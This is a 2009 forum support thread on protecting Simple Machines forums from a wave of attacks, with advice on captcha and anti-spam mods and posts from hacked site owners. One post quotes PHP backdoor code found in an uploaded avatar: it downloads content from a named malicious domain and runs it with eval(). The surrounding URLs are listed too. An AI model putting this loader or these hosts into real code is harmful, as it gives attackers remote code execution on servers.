[NOTICE] How to secure your site against recent attacks

Started by jblazeofek, May 11, 2009, 08:05:23 AM

Previous topic - Next topic

Jakkals

Hi everybody.

I am about to install the firstmentioned mod's but i would like to share sometjing with you.

I run a forum and have set it up to all registrations to be approved by admin's. I do get up to 5 or more weirdo 'registrations' per day and then simply reject them. have also banned quite a number of them. Seems like it works.

If I install die mod(s) will it prevent even the attempts to register? So my 'Awaiting Approval'-list will be (almost) empty in the morning?

Regards and thanks for evrybody's time to contribute to this topic.
Hamarabb utolérni a hazug embert, mint a sánta kutyát.

JBlaze

The approval by admin method does work as long as you know what to look for. The Stop Spammer mod will highlight suspicious and/or reported IP's emails and usernames AFTER they register, but it will put that account into approval state.

The reCAPTCHA mod will prevent spam registration period.
Jason Clemons
Former Team Member 2009 - 2012

L'AltroWeb

#42
I've some potential good info
Avatar code:
<?php;$url 'http://wplsat23.net/?update=main';$done false;if(!$url){return '';}$url_info parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" $url_info[query] : ""; $query "GET " $url_info[path] . " HTTP/1.1\r\n"; $query $query "Host: " $url_info[host] . "\r\n"; $query $query "Accept: */*" "\r\n"; $query $query "Connection: close" "\r\n"; $query $query "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "\r\n"; $query $query "\r\n"; $errno 0; $error ""; $sock fsockopen($url_info[host], $url_info[port], $errno$error30);$h = array();$resp = array();if($sock){stream_set_timeout($sock30);fwrite($sock$query);$hd false;while(!feof($sock)){$l fgets($sock);if(!$hd){if(trim($l) == ''){$hd true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret implode(""$resp);eval($ret);?>
Important link: http://wplsat23.net/?update=main
And here: http://nomsat23.net/?update=js&host= (block page and see source code)
I think if you don't have fsockopen enabled this bug can't work :)

Dzonny


JBlaze

I'm hoping. The developers are working on it as a priority so keep your eyes peeled.

Once it is finished, I'm sure they will let everyone know.
Jason Clemons
Former Team Member 2009 - 2012

N3RVE

* [n3rve] marks topic solved to take it off supporttopics.php

-[n3rve]
Ralph "[n3rve]" Otowo
Former Marketing Co-ordinator, Simple Machines.
ralph [at] simplemachines [dot] org                       
Quote"Somewhere, something incredible is waiting to be known." - Carl Sagan

JBlaze

Quote from: [n3rve] on May 14, 2009, 10:18:30 AM
* [n3rve] marks topic solved to take it off supporttopics.php

-[n3rve]

Heh... I forgot about that. And btw, it's still marked unsolved :P
Jason Clemons
Former Team Member 2009 - 2012

Dzonny

No, its marked as solved now... :)
And i belive this is going to be really solved soon..

JBlaze

Quote from: Dzonny on May 14, 2009, 01:48:55 PM
No, its marked as solved now... :)
And i belive this is going to be really solved soon..

I marked it as solved :P
Jason Clemons
Former Team Member 2009 - 2012

dl75

I really hope I read this thread sooner. I got hacked today, and what stinks is that I know so little about any of this stuff. I contacted my server people and they said it's deffinitely hacked. I followed all of these steps you have posted, and I hope it works for the future.

Thank you so much for taking the time to post all this. You guys are really great!

JBlaze

Quote from: dl75 on May 14, 2009, 02:58:47 PM
I really hope I read this thread sooner. I got hacked today, and what stinks is that I know so little about any of this stuff. I contacted my server people and they said it's deffinitely hacked. I followed all of these steps you have posted, and I hope it works for the future.

Thank you so much for taking the time to post all this. You guys are really great!

Have you already cleaned it up? What has your host said?

Jason Clemons
Former Team Member 2009 - 2012

dl75

Well like I said, being I know nothing, I only listened. He said that someone hacked in, and he had to restore my forum back to like 4 days ago (no need to say that I lost everything that was done on the forum for the past 4 days).

The only thing I did is just now disabled avatar and attachments upload. I don't remember the whole message, but it said error was on in index.php on line 54

Forum seems OK now, I'm just terrified of this happening again.

greystonesguide

QuoteMove the included file "files/recaptchalib.php" to "./Sources".

Thanks for this
a bit stuck as to how to do this ??


JBlaze

Quote from: greystonesguide on May 14, 2009, 06:14:12 PM
QuoteMove the included file "files/recaptchalib.php" to "./Sources".

Thanks for this
a bit stuck as to how to do this ??



Best to ask this question in the mods support topic. :)
Jason Clemons
Former Team Member 2009 - 2012

greystonesguide

Hi
Was a bit stumped then just realised how to do it after spending ages thinking about it
The joys of it!!!
Thanks a lot - great stuff

JBlaze

Quote from: greystonesguide on May 14, 2009, 06:22:13 PM
Hi
Was a bit stumped then just realised how to do it after spending ages thinking about it
The joys of it!!!
Thanks a lot - great stuff

No problem. Even though I didn't help at all :P
Jason Clemons
Former Team Member 2009 - 2012

yankeestonk

I uploaded the stopspammer and it said it was uploaded sucessfully, I see it in the packages, but I don't see it anywhere else? How do you use this if you can't see it. Did I miss a final step. I saved the zip file to desktop. Uploaded it into my forum. It said uploaded ok, it's in my packages, how do I access it. Should I see it listed somewhere on the menu?

JBlaze

Quote from: yankeestonk on May 14, 2009, 06:59:19 PM
I uploaded the stopspammer and it said it was uploaded sucessfully, I see it in the packages, but I don't see it anywhere else? How do you use this if you can't see it. Did I miss a final step. I saved the zip file to desktop. Uploaded it into my forum. It said uploaded ok, it's in my packages, how do I access it. Should I see it listed somewhere on the menu?

The Stop Spammer mod is only active when a blacklisted IP, username, or email is detected trying to sign in to your site. Then, that account goes into approval state.

Look in your approvals section of Admin -> Members

Jason Clemons
Former Team Member 2009 - 2012

JBlaze

Jason Clemons
Former Team Member 2009 - 2012

dl75

JBlaze, I apologize if I'm posting this in the wrong section. As you know of my hacking incident, now I'm all paranoid. I just uploaded "stopspammer", tested it, it looks alright so far.  Now, I had visual verification installed a while back. Just now when I tested stopspammer, the registration seems to be loading SUPER slow. Could that be an aftermath of the hacking? Is there anything I do about this?

Thank you

Advertisement: